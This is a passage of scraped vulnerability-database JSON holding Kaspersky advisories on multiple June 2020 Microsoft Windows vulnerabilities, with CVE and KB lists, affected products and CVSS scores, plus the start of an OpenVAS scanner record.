\n[CVE-2020-1196](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1196>)4.6Warning \n[CVE-2020-1194](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1194>)4.9Warning \n[CVE-2020-1299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1299>)9.3Critical \n[CVE-2020-1291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1291>)6.8High \n[CVE-2020-1317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1317>)9.0Critical \n[CVE-2020-1239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1239>)6.8High \n[CVE-2020-1236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1236>)9.3Critical \n[CVE-2020-1314](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1314>)6.8High \n[CVE-2020-1212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1212>)6.8High \n[CVE-2020-1311](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1311>)6.8High \n[CVE-2020-1255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1255>)6.5High \n[CVE-2020-1254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1254>)7.2High \n[CVE-2020-1271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1271>)4.6Warning \n[CVE-2020-1270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1270>)4.6Warning \n[CVE-2020-1251](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1251>)7.2High \n[CVE-2020-1253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1253>)7.2High \n[CVE-2020-1272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1272>)7.2High \n[CVE-2020-1302](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1302>)4.6Warning \n[CVE-2020-0986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0986>)7.2High \n[CVE-2020-1264](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1264>)4.6Warning \n[CVE-2020-1265](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1265>)4.6Warning \n[CVE-2020-1266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1266>)7.2High \n[CVE-2020-1261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1261>)2.1Warning \n[CVE-2020-1268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1268>)2.1Warning \n[CVE-2020-1269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1269>)7.2High \n[CVE-2020-1290](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1290>)2.1Warning \n[CVE-2020-1293](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1293>)4.6Warning \n[CVE-2020-1292](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1292>)6.8High \n[CVE-2020-1294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1294>)6.8High \n[CVE-2020-1296](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1296>)2.1Warning \n[CVE-2020-1259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1259>)4.0Warning \n[CVE-2020-1211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1211>)6.8High \n[CVE-2020-1162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1162>)4.6Warning \n[CVE-2020-1217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1217>)6.8High \n[CVE-2020-1282](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1282>)6.8High \n[CVE-2020-1283](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1283>)7.1High \n[CVE-2020-1280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1280>)6.8High \n[CVE-2020-1286](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1286>)9.3Critical \n[CVE-2020-1284](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1284>)4.3Warning \n[CVE-2020-1202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1202>)7.2High \n[CVE-2020-1203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1203>)7.2High \n[CVE-2020-1201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1201>)7.2High \n[CVE-2020-1206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1206>)5.0Critical \n[CVE-2020-1204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1204>)3.6Warning \n[CVE-2020-1324](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1324>)4.6Warning \n[CVE-2020-1209](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1209>)6.8High \n[CVE-2020-1238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1238>)6.8High \n[CVE-2020-1237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1237>)6.8High \n[CVE-2020-1235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1235>)6.8High \n[CVE-2020-1234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1234>)6.8High \n[CVE-2020-1233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1233>)6.8High \n[CVE-2020-1232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1232>)4.3Warning \n[CVE-2020-1231](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1231>)6.8High \n[CVE-2020-1334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1334>)4.6Warning \n[CVE-2020-1222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1222>)4.6Warning \n[CVE-2020-1309](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1309>)6.8High \n[CVE-2020-1307](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1307>)9.3Critical \n[CVE-2020-1306](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1306>)4.6Warning \n[CVE-2020-1305](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1305>)6.8High \n[CVE-2020-1304](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1304>)6.8High \n[CVE-2020-1197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1197>)7.2High \n[CVE-2020-1199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1199>)7.2High \n[CVE-2020-1120](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1120>)4.9Warning \n[CVE-2020-1316](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1316>)7.2High \n[CVE-2020-1310](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1310>)7.2High \n[CVE-2020-1258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1258>)7.2High \n[CVE-2020-1312](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1312>)4.6Warning \n[CVE-2020-1313](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1313>)6.8High \n[CVE-2020-1257](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1257>)4.6Warning \n[CVE-2020-1248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1248>)9.3Critical \n[CVE-2020-1244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1244>)5.8High \n[CVE-2020-1241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1241>)6.8High \n[CVE-2020-0915](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0915>)7.2High \n[CVE-2020-0916](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0916>)7.2High \n[CVE-2020-1279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1279>)4.6Warning \n[CVE-2020-1278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1278>)4.6Warning \n[CVE-2020-1273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1273>)4.6Warning \n[CVE-2020-1277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1277>)4.6Warning \n[CVE-2020-1276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1276>)4.6Warning \n[CVE-2020-1275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1275>)4.6Warning \n[CVE-2020-1274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1274>)4.6Warning\n\n### *KB list*:\n[4549951](<http://support.microsoft.com/kb/4549951>) \n[4556799](<http://support.microsoft.com/kb/4556799>) \n[4561649](<http://support.microsoft.com/kb/4561649>) \n[4560960](<http://support.microsoft.com/kb/4560960>) \n[4557957](<http://support.microsoft.com/kb/4557957>) \n[4561666](<http://support.microsoft.com/kb/4561666>) \n[4561602](<http://support.microsoft.com/kb/4561602>) \n[4561612](<http://support.microsoft.com/kb/4561612>) \n[4561674](<http://support.microsoft.com/kb/4561674>) \n[4561616](<http://support.microsoft.com/kb/4561616>) \n[4561608](<http://support.microsoft.com/kb/4561608>) \n[4561621](<http://support.microsoft.com/kb/4561621>) \n[4561673](<http://support.microsoft.com/kb/4561673>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4574727](<http://support.microsoft.com/kb/4574727>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "kaspersky", "title": "KLA11807 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1120", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1217", "CVE-2020-1222", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2020-12-10T00:00:00", "id": "KLA11807", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:03:18", "description": "### *Detect date*:\n06/09/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nInternet Explorer 9 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2016 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nInternet Explorer 11 \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1903 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-1160](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1160>) \n[CVE-2020-1281](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1281>) \n[CVE-2020-1287](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1287>) \n[CVE-2020-1348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1348>) \n[CVE-2020-1301](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1301>) \n[CVE-2020-1260](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1260>) \n[CVE-2020-1207](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1207>) \n[CVE-2020-1262](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1262>) \n[CVE-2020-1263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1263>) \n[CVE-2020-1246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1246>) \n[CVE-2020-1247](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1247>) \n[CVE-2020-1208](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1208>) \n[CVE-2020-1300](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1300>) \n[CVE-2020-1196](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1196>) \n[CVE-2020-1194](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1194>) \n[CVE-2020-1299](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1299>) \n[CVE-2020-1291](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1291>) \n[CVE-2020-1317](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1317>) \n[CVE-2020-1239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1239>) \n[CVE-2020-1214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1214>) \n[CVE-2020-1236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1236>) \n[CVE-2020-1230](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1230>) \n[CVE-2020-1314](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1314>) \n[CVE-2020-1315](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1315>) \n[CVE-2020-1213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1213>) \n[CVE-2020-1212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1212>) \n[CVE-2020-1215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1215>) \n[CVE-2020-1311](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1311>) \n[CVE-2020-1216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1216>) \n[CVE-2020-1255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1255>) \n[CVE-2020-1254](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1254>) \n[CVE-2020-1271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1271>) \n[CVE-2020-1270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1270>) \n[CVE-2020-1251](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1251>) \n[CVE-2020-1253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1253>) \n[CVE-2020-1272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1272>) \n[CVE-2020-1302](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-1302>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2020-1160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1160>)2.1Warning \n[CVE-2020-1281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1281>)6.8High \n[CVE-2020-1287](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1287>)6.8High \n[CVE-2020-1348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1348>)4.3Warning \n[CVE-2020-1301](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1301>)6.5High \n[CVE-2020-1260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1260>)7.6Critical \n[CVE-2020-1207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1207>)7.2High \n[CVE-2020-1262](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1262>)7.2High \n[CVE-2020-1263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1263>)2.1Warning \n[CVE-2020-1246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1246>)7.2High \n[CVE-2020-1247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1247>)7.2High \n[CVE-2020-1208](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1208>)9.3Critical \n[CVE-2020-1300](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1300>)6.8High \n[CVE-2020-1196](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1196>)4.6Warning \n[CVE-2020-1194](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1194>)4.9Warning \n[CVE-2020-1299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1299>)9.3Critical \n[CVE-2020-1291](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1291>)6.8High \n[CVE-2020-1317](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1317>)9.0Critical \n[CVE-2020-1239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1239>)6.8High \n[CVE-2020-1214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1214>)7.6Critical \n[CVE-2020-1236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1236>)9.3Critical \n[CVE-2020-1230](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1230>)7.6Critical \n[CVE-2020-1314](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1314>)6.8High \n[CVE-2020-1315](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1315>)2.6Warning \n[CVE-2020-1213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1213>)7.6Critical \n[CVE-2020-1212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1212>)6.8High \n[CVE-2020-1215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1215>)7.6Critical \n[CVE-2020-1311](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1311>)6.8High \n[CVE-2020-1216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1216>)7.6Critical \n[CVE-2020-1255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1255>)6.5High \n[CVE-2020-1254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1254>)7.2High \n[CVE-2020-1271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1271>)4.6Warning \n[CVE-2020-1270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1270>)4.6Warning \n[CVE-2020-1251](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1251>)7.2High \n[CVE-2020-1253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1253>)7.2High \n[CVE-2020-1272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1272>)7.2High \n[CVE-2020-1302](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1302>)4.6Warning\n\n### *KB list*:\n[4561669](<http://support.microsoft.com/kb/4561669>) \n[4561603](<http://support.microsoft.com/kb/4561603>) \n[4561645](<http://support.microsoft.com/kb/4561645>) \n[4561643](<http://support.microsoft.com/kb/4561643>) \n[4561670](<http://support.microsoft.com/kb/4561670>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "kaspersky", "title": "KLA11806 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2021-02-16T00:00:00", "id": "KLA11806", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11806/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T19:51:35", "description": "This host is missing a critical security\n update according to Microsoft KB4557957", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4557957)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1284", "CVE-2020-1120", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", 